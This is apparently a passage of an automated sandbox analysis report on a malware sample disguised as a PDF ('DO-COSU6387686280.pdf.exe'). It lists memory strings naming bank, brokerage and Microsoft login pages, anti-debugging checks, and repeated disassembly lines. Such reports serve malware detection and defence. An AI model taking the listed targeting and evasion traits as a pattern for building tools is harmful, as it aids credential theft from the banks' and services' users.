                    Source: p1h163LmP.6.drBinary or memory string: discord.comVMware20,11696494690f
                    Source: p1h163LmP.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: p1h163LmP.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: p1h163LmP.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                    Source: p1h163LmP.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: p1h163LmP.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: p1h163LmP.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: p1h163LmP.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: p1h163LmP.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: firefox.exe, 0000000B.00000002.2067305611.0000019ADBF4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: p1h163LmP.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: p1h163LmP.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: p1h163LmP.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: p1h163LmP.6.drBinary or memory string: global block list test formVMware20,11696494690
                    Source: EnLuReulIds.exe, 00000007.00000002.3910775657.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                    Source: p1h163LmP.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: p1h163LmP.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: p1h163LmP.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: p1h163LmP.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: p1h163LmP.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D096E rdtsc 3_2_017D096E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2B60 NtClose,LdrInitializeThunk,3_2_017D2B60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01834180 mov eax, dword ptr fs:[00000030h]3_2_01834180
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01834180 mov eax, dword ptr fs:[00000030h]3_2_01834180
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184C188 mov eax, dword ptr fs:[00000030h]3_2_0184C188
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184C188 mov eax, dword ptr fs:[00000030h]3_2_0184C188
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181019F mov eax, dword ptr fs:[00000030h]3_2_0181019F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181019F mov eax, dword ptr fs:[00000030h]3_2_0181019F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181019F mov eax, dword ptr fs:[00000030h]3_2_0181019F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181019F mov eax, dword ptr fs:[00000030h]3_2_0181019F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796154 mov eax, dword ptr fs:[00000030h]3_2_01796154
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796154 mov eax, dword ptr fs:[00000030h]3_2_01796154
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C156 mov eax, dword ptr fs:[00000030h]3_2_0178C156
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018561C3 mov eax, dword ptr fs:[00000030h]3_2_018561C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018561C3 mov eax, dword ptr fs:[00000030h]3_2_018561C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E1D0 mov eax, dword ptr fs:[00000030h]3_2_0180E1D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E1D0 mov eax, dword ptr fs:[00000030h]3_2_0180E1D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0180E1D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E1D0 mov eax, dword ptr fs:[00000030h]3_2_0180E1D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0180E1D0 mov eax, dword ptr fs:[00000030h]3_2_0180E1D0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C0124 mov eax, dword ptr fs:[00000030h]3_2_017C0124
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018661E5 mov eax, dword ptr fs:[00000030h]3_2_018661E5
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C01F8 mov eax, dword ptr fs:[00000030h]3_2_017C01F8
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov eax, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov ecx, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov eax, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov eax, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov ecx, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov eax, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov eax, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov ecx, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov eax, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E10E mov ecx, dword ptr fs:[00000030h]3_2_0183E10E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01850115 mov eax, dword ptr fs:[00000030h]3_2_01850115
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183A118 mov ecx, dword ptr fs:[00000030h]3_2_0183A118
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183A118 mov eax, dword ptr fs:[00000030h]3_2_0183A118
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183A118 mov eax, dword ptr fs:[00000030h]3_2_0183A118
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183A118 mov eax, dword ptr fs:[00000030h]3_2_0183A118
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01824144 mov eax, dword ptr fs:[00000030h]3_2_01824144
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01824144 mov eax, dword ptr fs:[00000030h]3_2_01824144
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01824144 mov ecx, dword ptr fs:[00000030h]3_2_01824144
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01824144 mov eax, dword ptr fs:[00000030h]3_2_01824144
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01824144 mov eax, dword ptr fs:[00000030h]3_2_01824144
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01828158 mov eax, dword ptr fs:[00000030h]3_2_01828158
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864164 mov eax, dword ptr fs:[00000030h]3_2_01864164
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01864164 mov eax, dword ptr fs:[00000030h]3_2_01864164
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A197 mov eax, dword ptr fs:[00000030h]3_2_0178A197
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A197 mov eax, dword ptr fs:[00000030h]3_2_0178A197
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A197 mov eax, dword ptr fs:[00000030h]3_2_0178A197
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D0185 mov eax, dword ptr fs:[00000030h]3_2_017D0185
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017BC073 mov eax, dword ptr fs:[00000030h]3_2_017BC073
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01792050 mov eax, dword ptr fs:[00000030h]3_2_01792050
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018280A8 mov eax, dword ptr fs:[00000030h]3_2_018280A8
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018560B8 mov eax, dword ptr fs:[00000030h]3_2_018560B8
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018560B8 mov ecx, dword ptr fs:[00000030h]3_2_018560B8
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A020 mov eax, dword ptr fs:[00000030h]3_2_0178A020
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C020 mov eax, dword ptr fs:[00000030h]3_2_0178C020
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018120DE mov eax, dword ptr fs:[00000030h]3_2_018120DE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018160E0 mov eax, dword ptr fs:[00000030h]3_2_018160E0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01814000 mov ecx, dword ptr fs:[00000030h]3_2_01814000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C0F0 mov eax, dword ptr fs:[00000030h]3_2_0178C0F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D20F0 mov ecx, dword ptr fs:[00000030h]3_2_017D20F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017980E9 mov eax, dword ptr fs:[00000030h]3_2_017980E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0178A0E3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826030 mov eax, dword ptr fs:[00000030h]3_2_01826030
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816050 mov eax, dword ptr fs:[00000030h]3_2_01816050
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017880A0 mov eax, dword ptr fs:[00000030h]3_2_017880A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179208A mov eax, dword ptr fs:[00000030h]3_2_0179208A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018163C0 mov eax, dword ptr fs:[00000030h]3_2_018163C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184C3CD mov eax, dword ptr fs:[00000030h]3_2_0184C3CD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018343D4 mov eax, dword ptr fs:[00000030h]3_2_018343D4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018343D4 mov eax, dword ptr fs:[00000030h]3_2_018343D4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov eax, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov eax, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov ecx, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov eax, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C310 mov ecx, dword ptr fs:[00000030h]3_2_0178C310
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B0310 mov ecx, dword ptr fs:[00000030h]3_2_017B0310
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA30B mov eax, dword ptr fs:[00000030h]3_2_017CA30B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA30B mov eax, dword ptr fs:[00000030h]3_2_017CA30B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA30B mov eax, dword ptr fs:[00000030h]3_2_017CA30B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C63FF mov eax, dword ptr fs:[00000030h]3_2_017C63FF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F0 mov eax, dword ptr fs:[00000030h]3_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F0 mov eax, dword ptr fs:[00000030h]3_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F0 mov eax, dword ptr fs:[00000030h]3_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov eax, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov ecx, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov eax, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov eax, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186634F mov eax, dword ptr fs:[00000030h]3_2_0186634F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01838350 mov ecx, dword ptr fs:[00000030h]3_2_01838350
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185A352 mov eax, dword ptr fs:[00000030h]3_2_0185A352
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov ecx, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788397 mov eax, dword ptr fs:[00000030h]3_2_01788397
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788397 mov eax, dword ptr fs:[00000030h]3_2_01788397
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788397 mov eax, dword ptr fs:[00000030h]3_2_01788397
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E388 mov eax, dword ptr fs:[00000030h]3_2_0178E388
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E388 mov eax, dword ptr fs:[00000030h]3_2_0178E388
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E388 mov eax, dword ptr fs:[00000030h]3_2_0178E388
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B438F mov eax, dword ptr fs:[00000030h]3_2_017B438F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B438F mov eax, dword ptr fs:[00000030h]3_2_017B438F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183437C mov eax, dword ptr fs:[00000030h]3_2_0183437C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810283 mov eax, dword ptr fs:[00000030h]3_2_01810283
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810283 mov eax, dword ptr fs:[00000030h]3_2_01810283
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810283 mov eax, dword ptr fs:[00000030h]3_2_01810283
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178826B mov eax, dword ptr fs:[00000030h]3_2_0178826B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794260 mov eax, dword ptr fs:[00000030h]3_2_01794260
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794260 mov eax, dword ptr fs:[00000030h]3_2_01794260
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794260 mov eax, dword ptr fs:[00000030h]3_2_01794260
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796259 mov eax, dword ptr fs:[00000030h]3_2_01796259
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov ecx, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A250 mov eax, dword ptr fs:[00000030h]3_2_0178A250
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178823B mov eax, dword ptr fs:[00000030h]3_2_0178823B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018662D6 mov eax, dword ptr fs:[00000030h]3_2_018662D6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02E1 mov eax, dword ptr fs:[00000030h]3_2_017A02E1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02E1 mov eax, dword ptr fs:[00000030h]3_2_017A02E1
